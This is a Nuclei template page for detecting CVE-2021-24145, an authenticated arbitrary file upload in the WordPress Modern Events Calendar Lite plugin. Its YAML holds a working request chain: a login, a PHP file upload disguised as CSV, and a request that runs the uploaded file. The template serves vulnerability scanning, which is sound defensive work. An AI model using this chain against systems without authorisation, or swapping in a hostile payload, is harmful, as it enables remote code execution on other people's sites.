Skip to content
Nuclei Templates

WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload

ID: CVE-2021-24145

Severity: high

Author: theamanrawat

Tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus

Description

Section titled “Description”

WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.

YAML Source

Section titled “YAML Source”
id: CVE-2021-24145


info:
  name: WordPress Modern Events Calendar Lite <5.16.5 - Authenticated Arbitrary File Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
  impact: |
    Remote code execution
  remediation: Fixed in version 5.16.5.
  reference:
    - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
    - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip
    - https://github.com/dnr6419/CVE-2021-24145
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24145
    - https://github.com/k0mi-tg/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-24145
    cwe-id: CWE-434
    epss-score: 0.96351
    epss-percentile: 0.99553
    cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: webnus
    product: modern_events_calendar_lite
    framework: wordpress
  tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
variables:
  string: "CVE-2021-24145"


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin.php?page=MEC-ix&tab=MEC-import HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: multipart/form-data; boundary=---------------------------132370916641787807752589698875


        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
        Content-Type: text/csv


        <?php echo md5("{{string}}");unlink(__FILE__);?>


        -----------------------------132370916641787807752589698875
        Content-Disposition: form-data; name="mec-ix-action"


        import-start-bookings
        -----------------------------132370916641787807752589698875--
      - |
        GET /wp-content/uploads/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'
# digest: 4a0a00473045022100e12e39efde0616674c9f8b67ea8e2e7d49057b0b3a1457eaefe4733b524b921d0220265fa3e3185220908dac1a42de0a0e7a236e355ca04c4cd9908c8a647b465bde:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24145.yaml"

View on Github